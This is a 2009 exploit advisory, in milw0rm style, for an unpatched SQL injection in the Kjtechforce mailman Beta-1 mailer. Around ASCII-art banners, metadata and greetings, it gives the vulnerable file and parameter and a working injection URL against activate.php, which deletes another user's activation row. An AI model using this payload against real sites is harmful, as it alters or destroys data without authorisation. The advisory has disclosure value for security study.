Kjtechforce Mailman Beta-1 SQL Injection

`***********************************************************************************************  
***********************************************************************************************  
** **  
** **  
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **  
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **  
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **  
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\   
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--  
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/   
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **  
** **  
** **  
** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O **  
** ¡PROUD TO BE SPANISH! **  
** **  
***********************************************************************************************  
***********************************************************************************************  
  
----------------------------------------------------------------------------------------------  
| SQL INJECTION VULNERABILITY |  
|--------------------------------------------------------------------------------------------|  
| | Kjtechforce mailman Beta-1 | |  
| CMS INFORMATION: ---------------------------------- |  
| |  
|-->WEB: http://sourceforge.net/projects/kjtechforce/ |  
|-->DOWNLOAD: http://sourceforge.net/projects/kjtechforce/ |  
|-->DEMO: N/A |  
|-->CATEGORY: CMS / Mailer |  
|-->DESCRIPTION: The kjtechforce project has aimed at the tool making |  
| that supports kjclub.com from the outside... |  
|-->RELEASED: 2009-05-16 |  
| |  
| CMS VULNERABILITY: |  
| |  
|-->TESTED ON: firefox 3 |  
|-->DORK: N/A |  
|-->CATEGORY: SQL INJECTION |  
|-->AFFECT VERSION: CURRENT |  
|-->Discovered Bug date: 2009-06-02 |  
|-->Reported Bug date: 2009-06-02 |  
|-->Fixed bug date: Not fixed |  
|-->Info patch: Not fixed |  
|-->Author: YEnH4ckEr |  
|-->mail: y3nh4ck3r[at]gmail[dot]com |  
|-->WEB/BLOG: N/A |  
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |  
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) |  
----------------------------------------------------------------------------------------------  
  
  
#########################  
////////////////////////  
  
SQL INJECTION (SQLi):  
  
////////////////////////  
#########################  
  
  
  
<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>  
  
  
  
[++] GET var --> 'code'  
  
[++] File vuln --> 'activate.php'  
  
[++] Note --> Code must be 40 characters long  
  
  
  
~~> http://[HOST]/[PATH]/activate.php?code=1111111111111111111111111'+OR+user_id='2  
  
  
  
[++[Return]++] ~~~~~> Delete row with id=2 from "mailman_activator" (included sha-1 code)  
  
  
  
  
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!  
  
  
##############################################################################  
##############################################################################  
##**************************************************************************##  
## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##  
##**************************************************************************##  
##--------------------------------------------------------------------------##  
##**************************************************************************##  
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##  
##**************************************************************************##  
##############################################################################  
##############################################################################  
  
  
  
`